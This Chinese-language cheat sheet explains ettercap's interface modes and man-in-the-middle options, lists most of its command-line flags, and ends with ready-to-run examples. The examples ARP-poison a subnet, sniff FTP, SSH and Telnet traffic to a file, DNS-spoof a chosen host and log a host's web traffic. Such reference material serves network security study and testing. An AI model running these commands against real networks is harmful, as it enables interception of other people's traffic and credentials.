关于界面:
ettercap提供 4 种运行界面:- Text #文本模式,参数 -T ,一般配合 -q(安静模式)使用
- Curses/GTK #图形模式,参数 -C/-G
- Daemonize #守护模式(后台模式),参数 -D
- Unified #中间人模式,即两台终端间进行欺骗,参数 -M
- Bridged #双网卡之间进行欺骗,参数 -B
- -M, –mitm
- ARP欺骗,参数 -M arp
- remote #双向模式,同时arp欺骗通信的双方,参数 -M arp:remote
- oneway #单向模式,只arp欺骗第一个目标到第二个目标的通信,参数 -M arp:oneway
- icmp欺骗,参数 -M icmp:(MAC/IP)
- DHCP欺骗,参数 -M dhcp:(ip_pool/netmask/dns),如 -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1是给新接入的主机提供ip地址,子网掩码和网关,-M dhcp:/255.255.255.0/192.168.0.1则不提供ip地址,只欺骗子网掩码和网关
- Port Stealing,这个没搞懂~
- -o, –only-mitm #只进行中间人攻击,不进行嗅探
- -f , –pcapfilter #加载过滤器
- -B, –bridge #Bridged sniffing
- -r, –read #读取本地文件
- -w, –write #将嗅探数据保存到本地
- -T, –text #文本模式显示
- -q, –quiet #安静模式,不显示嗅探数据
- -s, –script #加载脚本
- -C, –curses #curses-UI模式
- -G, –gtk #GTK-UI模式
- -D, –daemonize #daemonize后台模式
- -b, –broadcast #嗅探广播地址
- -i, –iface #选择网卡
- -I, –iflist #列出可用网卡
- -Y, –secondary #后备网卡
- -A, –address #ip地址,针对一网卡多ip的情况
- -n, –netmask
- -R, –reversed
- -z, –silent #不进行arp毒化和主机扫描
- -p, –nopromisc
- -S, –nosslmitm #不使用ssl中间人攻击
- -t, –proto #协议,tcp/udp/all,默认为all
- -u, –unoffensive
- -j, –load-hosts #加载保存的主机地址
- -k, –save-hosts #保存扫描到的主机地址
- -P, –plugin #载入插件
- -F, –filter #载入过滤器文件
- -W, –wifi-key #载入wifi密码:
- -a, –config #载入并使用一个非默认配置文件
- –certificate #ssl攻击使用指定的 证书文件
- –private-key #ssl攻击使用指定的私钥文件
- -e, –regex #使用一个正则表达式
- -V, –visual #显示方式
- hex #16进制
- ascii #ASCII码
- text
- ebcdic
- html
- utf8
- -d, –dns #把ip地址转化为主机名
- -E, –ext-headers
- -Q, –superquiet #超级安静模式,啥信息都不显示,只保存
- -L, –log #把所有数据包保存log文件
- -l, –log-info #读取离线log文件信息
- -m, –log-msg #显示存储在log文件里所有用户用ettercap抓取的信息
- -c, –compress #通过gzip算法压缩log文件
- –o, –only-local #只存储本地局域网主机配置信息
- -O, –only-remote #只存储远程主机配置信息
ettercap -Tqi eth0 -M ARP // // #arp毒化eth0所在的网段,安静模式文本显示ettercap -Tzq /10.0.0.1/21,22,23 -w hack.pcap #监听10.0.0.1的ftp,ssh,telnet信息,并保存到本地ettercap -Tq -P dns_spoof -M arp /192.168.1.120/ // #对192.168.1.120进行dns欺骗,使用默认网卡eth0,文本模式安静显示ettercap -Tqi eth0 -L sniffed_data -F filter.ef -M arp:remote /10.0.0.2/80 // #使用过滤并监听10.0.0.2在80端口的所有通信,安静模式文本显示,保存数据到本地ettercap -Tqi eth0 -M ARP /ip// -w scan.log